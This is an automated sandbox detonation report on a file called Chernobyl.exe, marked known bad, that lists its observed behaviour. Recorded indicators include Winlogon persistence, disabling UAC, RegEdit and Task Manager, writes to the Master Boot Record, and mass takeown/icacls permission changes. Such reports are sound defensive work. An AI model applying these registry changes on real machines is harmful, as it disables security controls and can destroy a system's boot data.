Analysis Overview
SHA256
3df8578b571811a77eefdf07069bd4d1ba16af70dba81bcf91d8182171728f74
Threat Level: Known bad
The file Chernobyl.exe was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
Contains code to disable Windows Defender
UAC bypass
Disables Task Manager via registry modification
Possible privilege escalation attempt
Disables RegEdit via registry modification
Modifies system executable filetype association
Modifies file permissions
Writes to the Master Boot Record (MBR)
Checks whether UAC is enabled
Modifies WinLogon
Sets desktop wallpaper using registry
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Modifies File Icons
Modifies Control Panel
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
System policy modification
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-03 19:33
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-03 19:33
Reported
2024-03-03 19:35
Platform
win7-20240221-en
Max time kernel
44s
Max time network
19s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\kill.ico | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| File opened for modification | C:\Windows\System32\wallpaper.jpg | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\cluttscape.exe | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| File opened for modification | C:\Windows\cluttscape.exe | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\Desktop\WallpaperStyle = "2" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies File Icons
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe
"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
